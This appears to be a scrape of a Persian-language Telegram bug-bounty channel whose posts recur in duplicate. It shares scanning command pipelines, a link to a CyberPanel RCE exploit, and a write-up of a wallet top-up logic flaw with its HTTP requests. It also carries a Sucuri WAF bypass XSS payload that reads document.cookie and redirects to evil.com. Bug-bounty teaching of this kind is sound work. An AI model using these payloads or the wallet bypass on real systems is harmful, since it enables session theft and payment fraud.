بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
پ.ن: ASIS خشن مینوازد😂😂
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
#web
#Pentest
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیازها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
#web
#Pentest
👍13❤3
یک چنل با محتوای بدرد بخور:
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
https://news.1rj.ru/str/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
Telegram
Bugbounty Tips
research and sharing in cybersecurity
👍15🔥1
https://github.com/coffinxp/nuclei-templates
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
how to use in bug bounty programs:
subfinder -d xyz.com -all | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all | nuclei -t iis.yaml
subfinder -d xyz.com -all | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
GitHub
GitHub - coffinxp/nuclei-templates
Contribute to coffinxp/nuclei-templates development by creating an account on GitHub.
👍5👎1🔥1
دوستان کار نشد نداره حتی کمپانی که بزرگه تیم امنیت داره و... هم میتونه آسیب پذیری های خطرناکی داشته باشه چه بسا تیم داخلی بصورت وایت باکس و بلک باکس تست کنه و همچنین پنتست سالینه خارج از سازمان بشه،اسکیلاتونو لول آپ کنین
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
عمیق بشین توی آسیب پذیری ها و ذهنیت هکر داشته باشه باشین،توی باگ بانتی چون که قبلش تیم های امنیت و پروژه های تست نفوذ خارجی روی asset انجام میشه، اگر بروز و عمیق نباشید نتیجه دلخواه رو نمیگیرین..
❤11👍3
Sucuri WAF Bypass:
payload:
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
payload:
<a aa aaa aaaa aaaaaa href=javanoscript:alert(document.cookie)>ClickMe
<a href="javanoscript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#WEB
👍3👀2
Email-verification-bypass.mkv
56.6 MB
سلام دوستان برای Email Verification bypass یک ویدیو براتون آماده کردم که روی برنامه پابلیک هکروان بود
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
(https://hackerone.com/opensea?type=team)
با توضیحات آسیب پذیری که تجربه یک سناریو ساده و کاربردی رو بهتون انتقال میده، امیدوارم براتون مفید باشه
تایتل آسیب پذیری:
Email Verification Bypass
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Video
#Writeup
👍20❤8🤝2🔥1👏1
Logger++ Custom Filters
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#bugbounty
A comprehensive list of custom filters for Logger++ to identify various #vulnerabilities in different #API styles
https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#LINK
#bugbounty
GitHub
GitHub - bnematzadeh/LoggerPlusPlus-API-Filters: A comprehensive list of custom filters for Logger++ to identify various vulnerabilities…
A comprehensive list of custom filters for Logger++ to identify various vulnerabilities in different API styles - bnematzadeh/LoggerPlusPlus-API-Filters
👍9
Media is too big
VIEW IN TELEGRAM
🐞 Party🥳🥳
به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
به همه عوامل برگذارکنندگان این رویداد خسته نباشید میگم تا اینجا خیلی خوش گذشته✌️
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
❤15👎4
CyberPanel-RCE
https://github.com/DreyAnd/CyberPanel-RCE
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#exploit
#Bugbounty
https://github.com/DreyAnd/CyberPanel-RCE
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#exploit
#Bugbounty
🔥5
شارژ کیف پول بدون پرداخت!
آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت..
ساده، جالب و بدرد بخور
فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت میشد و در صورت موفق بودن میرفت برای callback به این شکل:
آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت..
ساده، جالب و بدرد بخور
فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت میشد و در صورت موفق بودن میرفت برای callback به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:
{"method":"zarinpal","amount":"200000"}
🔥6👍1
Bugbounty Tips
شارژ کیف پول بدون پرداخت! آسیب پذیری منطقی که در درخواست شارژ کیف پول وجود داشت.. ساده، جالب و بدرد بخور فلو شارژ اینجوری بود که یک درخواست به سامانه میرفت با پارامتر method یک درگاه رو انتخاب میکرد به همراه رقم، در پاسخ لینک پرداخت رو به کاربر میداد ریدایرکت…
با خودم گفتم متد وقتی متد درگاه وجود داره ممکنه از متد wallet هم بابت پرداخت هزینه های سرویس سایت از ولت کاربر هم استفاده بشه
تیر تو تاریکی..
متد رو کردم ولت به این شکل:
در کمال تعجب ولت من شارژ شد!
جالب بود برام گفتم برای شما هم به اشتراک بزارم.
امیدوارم براتون مفید باشه❤️
تیر تو تاریکی..
متد رو کردم ولت به این شکل:
POST /api/wallet-payment HTTP/2
Host: (:
{"method":"wallet","amount":"20000000"}
در کمال تعجب ولت من شارژ شد!
جالب بود برام گفتم برای شما هم به اشتراک بزارم.
امیدوارم براتون مفید باشه❤️
👏24❤3